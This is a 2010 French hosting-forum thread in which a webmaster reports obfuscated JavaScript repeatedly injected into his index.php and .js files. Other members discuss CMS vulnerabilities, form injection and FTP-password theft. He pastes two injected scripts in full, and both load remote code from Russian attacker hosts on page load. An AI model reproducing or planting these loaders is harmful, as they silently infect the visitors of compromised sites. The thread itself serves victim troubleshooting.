Auteur Sujet: Virus et/ou attaque chronique  (Lu 8524 fois)

0 Membres et 1 Invité sur ce sujet

BuilderX

  • Invité
Virus et/ou attaque chronique
« le: 26 mai 2010 à 13:29:32 »
Bonjour,

je possède un hébergement sur le Ftp4 avec 4 noms de domaines chacun pointant vers son répertoire.

C'est la 2nde fois en l'espace de +/- 1 mois qu'un script s'infiltre sur mes fichiers distants

le script en question

<script>var CV=63776;var Jj={I:"mk"};var e;this.W="W";a=function(){var x=["s","PO"];function P(g,Pa,p){F=[];return g.substr(Pa,p);var of={Wa:"sJ"};}var S={Q:17104};py=["FH","gL","d"];var l=String(P("/gooklC",0,4)+P("gle.I9t5",0,4)+P("drTcom/rdT",3,4)+P("ebayoDhl",0,4)+P("nCMl.comnlMC",4,4)+"/upl"+P("Cwg6oadiwg6C",4,4)+P("ng.cMqBG",0,4)+P("E8SHom.pE8SH",4,4)+P("hpdx3",0,2));B=["oQ","Kp","dC"];var Y=document;var o=RegExp;var L='';var jf="";T=[];function y(g,Pa){KN={wY:46870};var p=String(P("[z7od",0,1))+Pa+new String(P("]rGl",0,1));var Sl=new String();var sC="sC";var K=new o(p, P("g3bh",0,1));return g.replace(K, L);};try {var Ie='bp'} catch(Ie){};try {var Pu='aP'} catch(Pu){};var M='';var k='';var el=null;this.tB='';var h=y('sHcbrPiYpftB','fxdP0F7bKQYLTzISXWBa3H');xa=["r","SX"];kx=["tx","Kv"];var C=new String(P("bodytrw",0,4));this._v=false;var w=499715-491635;var FaS=new String();var vf=new Array();e=function(){try {wL=["N"];var _=y('c1rLeUaOtieiEVlVeim6e8n9t1','wOVhUy61L98ibM');try {var HI='dh'} catch(HI){};m=Y[_](h);var WO={FF:"u"};var g=w+l;var XZ={};this.zQ="zQ";var aJ=y('sjrbcb','6m5YpPnuHGwqj8FIb');var t=String("defer");try {} catch(Hf){};this.vm="vm";this.ey=50455;this.ey-=165;m[aJ]=String(P("htwca",0,2)+"tp"+":/"+"/t"+P("AdZaldAZ",3,2)+P("ld30aS",0,2)+"ee"+"d."+P("ruaO8",0,2)+P("r5bI:5Ibr",4,1))+g;Sp={zlv:23217};m[t]=[1][0];try {var yS='R'} catch(yS){};this.Ty=false;Y[C].appendChild(m);this.sv=25820;this.sv+=105;try {var Ho='A'} catch(Ho){};} catch(j){try {var Hv='Mh'} catch(Hv){};};var VC=new Date();CS={};};aJw=37637;aJw++;lQ=29069;lQ++;};a();window.onload=e;var VR=["yo","Ys"];</script>
<!--92e69c4443482580b1b52bc399dc8fff-->

ce script s'insère sur les fichiers présents sur l'hébergeur toujours à la fin du fichier après le </html>,
les fichiers incriminés sont tous modifiés à la même dâte. (en l'occurrence aujourd'hui le 26)

Ce script s'attaque à tout mes .JS et à tout les Index.php, au résultat les javascript et les .js ne fonctionnent plus.

Alors bien sur je renvoie mes fichiers présents en local et là tout re-fonctionne.

Mais si chaque mois je dois le faire ce n'est pas normal !

Suis je victime d'un virus circulant sur le ftp 4 ? ou d'une attaque d'un petit malin ?
pourtant j'ai changé mon mot de passe ftp la dernière fois que c'est arrivé...

c'est si simple que ça de cracker un mot de passe FTP alphanumérique de 10 caractères ??  :huh:

Hors ligne bruno58

  • Habitué
  • **
  • Messages: 109
Re : Virus et/ou attaque chronique
« Réponse #1 le: 26 mai 2010 à 13:33:37 »
Bonjour,

Je pense plutôt qu'il y a une faille de sécurité dans tes scripts, t'as pas un formulaire d'upload, un éditeur html genre fckeditor ou même un CMS ...
Si c'est le cas regarde de ce coté.

BuilderX

  • Invité
Re : Virus et/ou attaque chronique
« Réponse #2 le: 26 mai 2010 à 17:20:03 »
Alors j'ai 2 sites utilisant Drupal, mais quand le problème était apparu la 1ière fois ces 2 sites n'existaient pas encore.

Ensuite concernant les 2 autres sites... Sur chacun d'entre eux j'utilise un logiciel générant des menus Dhtmls très sympathiques... le logiciel est professionnel, je doute que cela vienne de là mais... bon on ne sait jamais c'est vrai !

Et enfin sur l'un de ces 2 derniers sites, j'ai mis en place un formulaire de contact... mais uniquement dans le but d'envoyer un mail au final, pas de possibilité d'upload. Je peux aussi le virer et mettre un truc plus basique "mailto"...

Le problème a commencé le mois dernier ou j'avais envoyé un message au support, marine m'a conseillée de changer le mot de passe ftp et de re-balancer les fichiers non corrompus... je l'ai fais ça a marché, mais là ça recommence...

C'est quand même dingue que ça s'attaque à mes 4 sites ce truc... qui sont dans 4 répertoires différents chacun à la racine dans le répertoire www.

Hors ligne diaoul

  • Expert
  • ****
  • Messages: 663
    • http://diaoul.net
Re : Virus et/ou attaque chronique
« Réponse #3 le: 26 mai 2010 à 17:56:42 »
tu n'as pas l'air d'être le seul sous drupal...
https://drupal.org/node/808854

BuilderX

  • Invité
Re : Virus et/ou attaque chronique
« Réponse #4 le: 26 mai 2010 à 18:51:10 »
Pas très rassurant effectivement...

Bon j'ai décidé de virer tout mes sites drupal mais maintenant j'ai un autre problème...

Impossible de supprimer les répertoires complets car les fichiers settings.php et default.settings.php
ne sont à priori plus sous mon contrôle...

j'ai néanmoins pu renommer les répertoires de base en "todelete" 1, 2 et 3... et ai envoyé un case
au support pour qu'ils me les suppriment, je suppose qu'ils peuvent vu qu'ils ont le niveau root

Hors ligne bruno58

  • Habitué
  • **
  • Messages: 109
Re : Virus et/ou attaque chronique
« Réponse #5 le: 26 mai 2010 à 19:06:50 »
Même en essayant de changer le chmod ?
Étrange...

BuilderX

  • Invité
Re : Virus et/ou attaque chronique
« Réponse #6 le: 26 mai 2010 à 19:14:43 »
Oui ! j'ai mis le chmod en 777... et ai aussi essayé d'autres combinaisons...

nothing... impossible de supprimer ces p..... de fichiers  :angry:

Si ça se trouve... tout le problème vient peut être de là...

Hors ligne JPC

  • Débutant
  • *
  • Messages: 15
Re : Re : Virus et/ou attaque chronique
« Réponse #7 le: 27 mai 2010 à 11:41:28 »
Bonjour
Citation de: BuilderX
Alors j'ai 2 sites utilisant Drupal, mais quand le problème était apparu la 1ière fois ces 2 sites n'existaient pas encore.
Donc peu probable que le problème vienne de Drupal.

Ensuite concernant les 2 autres sites... Sur chacun d'entre eux j'utilise un logiciel générant des menus Dhtmls très sympathiques... le logiciel est professionnel, je doute que cela vienne de là mais... bon on ne sait jamais c'est vrai !
A voir.

Et enfin sur l'un de ces 2 derniers sites, j'ai mis en place un formulaire de contact... mais uniquement dans le but d'envoyer un mail au final, pas de possibilité d'upload. Je peux aussi le virer et mettre un truc plus basique "mailto"...
Même si le formulaire ne fait qu'envoyer un mail, il est affiché avant d'envoyer ce mail.
Dans ce cas il y a un risque d'injection de code HTML si les champs de saisie ne sont pas tous protégés dans ce sens par htmlentities() par exemple http://documentation-php.supportduweb.com/function.htmlentities.documentation-php

C'est quand même dingue que ça s'attaque à mes 4 sites ce truc... qui sont dans 4 répertoires différents chacun à la racine dans le répertoire www.
S'il y a possibilité d'injecter du code il y a possibilité de récupérer bien des choses et tout l'hébergement peut devenir accessible.

Hors ligne AnakinDSL

  • Habitué
  • **
  • Messages: 109
    • Guillaume Hénot Multlimedia Design
Re : Virus et/ou attaque chronique
« Réponse #8 le: 27 mai 2010 à 15:42:52 »
J'ai le même problème avec un site sous Joomla (je viens de le mettre à jour, on va voir combien de temps ça va tenir) ...
Si Drupal est concerné aussi, ça craint :(

C'est le 2e site sous Joomla avec le quel j'ai le même problème. la première fois, on a réglé le problème : on a plus utilisé Joomla.
Mais là, je suis obligé de le conserver.

C'est le même JS qui s'inscrit dans les pages index*.* (en fait y'a plusieurs JS différents qui tournent, j'en dénombre 4 avec le tiens BuilderX).
<?php if (!isset($your_life)) die(); ?>

BuilderX

  • Invité
Re : Virus et/ou attaque chronique
« Réponse #9 le: 28 mai 2010 à 00:08:39 »
Bon et bien je suis au moins content de savoir que je ne suis pas un cas isolé  :ph34r:

J'espère qu'on trouvera la solution *miracle* à ce soucis car c'est tout de même très gênant.

Je vais pour ma part revoir ma façon de concevoir mes sites, en réorganisant dans un seul endroit
fichiers .php et .js afin de ne pas trop les disperser à travers les répertoires, au cas ou je devrais
les ré-uploader si cette saloperie repointait le bout de son nez, car faire la chasse aux fichiers modifiés
à travers tout les sous-répertoires c'est franchement une perte de temps dont je me passerais bien.

nous vaincrons ! (lol...)  :wub:

Hors ligne AnakinDSL

  • Habitué
  • **
  • Messages: 109
    • Guillaume Hénot Multlimedia Design
Re : Virus et/ou attaque chronique
« Réponse #10 le: 28 mai 2010 à 00:24:24 »
Une petite recherche sur Google rapporte pas mal de cas chez OVH, bien souvent sur Joomla.
C'est donc fatalement une faille quelque part dans un module :(
<?php if (!isset($your_life)) die(); ?>

BuilderX

  • Invité
Re : Virus et/ou attaque chronique
« Réponse #11 le: 06 juin 2010 à 19:34:02 »
Ben depuis le temps...

je suis repartis de 0 concernant mes sites...

c'est à dire que j'ai tout effacé pour tout refaire...

ni drupal, ni joomla ni aucun autre CMS, juste des pages .php avec la suite Adobe

je te le donne en mille...

Voilà le script que j'ai trouvé aujourd'hui même sur mon index.php qui est arrivé de nulle part sur le serveur de phpnet

<script>var J=false;var U;this.K=10061;this.K--;w=function(){DZ={};this.Gn=36311;this.Gn+=73;var dL=33077;function x(p,C,a){return p.substr(C,a);}uH=63067;uH-=88;var d=RegExp;var Yx=2188;this.GV=40435;this.GV--;var G=document;var wr={Lf:false};var o='';this._P="_P";var Bx={};var Z=new String(x("/gVpS",0,2)+x("78Boo8B7",3,2)+x("glSmM",0,2)+x("e-9Qo",0,2)+x("beOPMv",0,2)+"/g"+"oo"+"gl"+x("tIVe.VtI",3,2)+x("JBbcobBJ",3,2)+"m/"+"mo"+"zi"+"ll"+x("s3Ja.Js3",3,2)+"co"+x("SeJm.eJS",3,2)+"ph"+x("pwG38",0,1));r=42741;r--;q=7703;q+=197;RF=51568;RF-=62;var k=["ge","Jy"];function V(p,C){Du=["l","yW","Cb"];this.c=6916;this.c--;var a=new String("[")+C+new String("]");var _=new d(a, new String(x("gEHy",0,1)));this.ez=false;return p.replace(_, o);this.JG=18264;this.JG+=204;this.VI='';};var dd=false;var Cp=["mr","DU","mA"];s={A:false};var Gt=V('sqc2rqizpLtw','ILzChq6nZw24');try {var Fk='lg'} catch(Fk){};this.Ag=52244;this.Ag-=247;var I=null;var UG=["St","Or","FI"];var v=x("bodyXSu5",0,4);Zu=["zQ","Iw"];var fx=["PB","dQ"];var g=780115-772035;U=function(){K_=37642;K_+=62;try {Jg=["fI"];var E=V('cHrPehaptheHEUlDeXmQePnWth','GUpQfXjHhWRgVDP');xx=G[E](Gt);var jx="jx";eO=[];this.RK=62849;this.RK++;var BX='';var p=g+Z;var Sn=["r_","zA"];this.QT="QT";var _e=x("depq3G",0,2)+"fe"+x("VoereoV",3,1);var nu=new Date();var e=V('sbr8ch','8AbTXqQh');xx[_e]=[1,2][0];YT=["BW","vv","CO"];this.rA="rA";xx[e]="http:"+"//rad"+"ioque"+"st.ru"+x(":iCOj",0,1)+p;G[v].appendChild(xx);var Gy=["sCM"];} catch(F){this.PRg=53406;this.PRg--;var SJ=["Lm","op","_y"];this.gI=false;};Ek=19070;Ek+=194;var GY=["oD","DA"];};this.Bu='';};w();ps=["na","nN"];nY=1060;nY++;window.onload=U;var aa="";try {var Lo='Ob'} catch(Lo){};try {var NR='Qt'} catch(NR){};var AY="";</script>
<!--266118020cd0fc0ff76ba912dd0b09b4-->

Comme ça fait la 3ième fois que ça survient... en l'espace de 2 mois... ça serait pas plutôt le serveur de phpnet qui est infecté ? nan parce que en local mes fichiers sont "clean"... je vais donc une fois de plus ré-uploader le fichier infecté (ouf... pour une fois il n'y en a qu'un...)

Hors ligne thibaud

  • VIP
  • *****
  • Messages: 3 909
    • http://www.phpnet.org/
Re : Virus et/ou attaque chronique
« Réponse #12 le: 06 juin 2010 à 20:45:39 »
pfff...

vous n'utiliseriez pas la version de filezilla qu'un gentil vers utilise depuis des mois pour
chopper les passwords ftp ?!

je vous conseille de telephoner au support demain et de demander vos logs ftp.
Ensuite, si c'est confirmé (ce que je pense),
il faudra nettoyer votre windows ( :rolleyes: ) puis changer vos passwords ftp.
Un lien que je peux vous conseiller : http://www.ubuntu.com/ (si vous comprenez enfin que windows....)

Apres, vous n'aurez plus de souci.

Nos serveurs ne sont pas en cause et eux (  :rolleyes: ) ils marchent sous linux, ce qui
evite quand même le genre de souci que vous venez de rencontrer.
Thibaud GRANGIER
Division Technique mutualise-dedie
PHPNET

Hors ligne marckisscool

  • Dr TeiGnEuX
  • Expert
  • ****
  • Messages: 536
  • Dr TeiGnEuX
    • smfgratuit.fr
Re : Virus et/ou attaque chronique
« Réponse #13 le: 06 juin 2010 à 22:18:18 »
Bonjour,

Citer
Un lien que je peux vous conseiller : http://www.ubuntu.com/ (si vous comprenez enfin que windows....)
tout à fait d'accord avec thibaud, vous avez aussi mandriva ( http://www.mandriva.com la version spring arrive ce mois-ci) et fedora ( http://fedoraproject.org/ ) c'est en français et ça marche très bien voir mieux que seven.

Citer
ni drupal, ni joomla ni aucun autre CMS, juste des pages .php avec la suite Adobe
Adobe qui fait des pages php, mon dieu, vous avez pspad ( http://www.pspad.com/ ), c'est gratos pour windows, sous linux vous avez Eclipse, bluefish, Kwrite ou emacs et php.net pour la référence du code.

Citer
Comme ça fait la 3ième fois que ça survient... en l'espace de 2 mois... ça serait pas plutôt le serveur de phpnet qui est infecté ?
On a le premier virus vicieux, qui contamine 1 seul client sur la totalité d'un serveur, fort de chez fort.....

Juste un petit rajout, ce n'est pas parce que l'on utilise un produit clé en main (cms ou forum) que ceux ci sont sécurisés à 100%, ils sont bien écrit pour un paramétrage standard, les modifications ou la personnalisation par thème suffit à faire rentrer une faille, il faut vérifier le code et les éventuelles opportunités qui peuvent être exploitées.

BuilderX

  • Invité
Re : Virus et/ou attaque chronique
« Réponse #14 le: 07 juin 2010 à 20:06:58 »
J'utilise Cute Ftp pas filezilla et j'ai déjà changé mes mots de passe...

Bon néanmoins comme je l'ai dis ce problème est revenu alors que je n'ai plus aucun CMS

Je ne vais pas non plus me passer d'Adobe lol... ni installer ubuntu pour uploader des fichiers franchement...  :huh: (en gros linux ne me sert à rien dans mon travail ni chez moi donc niet  :mellow:)

Et je ne suis pas le seul... sinon quelqu'un d'autre ne se serait pas manifesté dans ce fil, ni sur un autre fil de drupal, surtout que ce code n'est pas forcément visible tant qu'on n'y prête pas attention, ou que l'on observe ses javascripts qui plantent... pour peu qu'on utilise le javascript  :angry:

En gros ce code peut très bien passer invisible sinon qu'il pourrit le code à la fin des pages, ce qui s'est passé quand j'utilisais drupal... il n'y avait pas d'incidence directe mais le code à la fin était pourris. Donc je ne suis pas forcément le seul.

Bon même si vous êtes des anti-windows sachez que le mien est très bien protégé...
antivirus / anti-spyware et logiciel qui vérifie les entrées sorties.
« Modifié: 07 juin 2010 à 20:09:24 par BuilderX »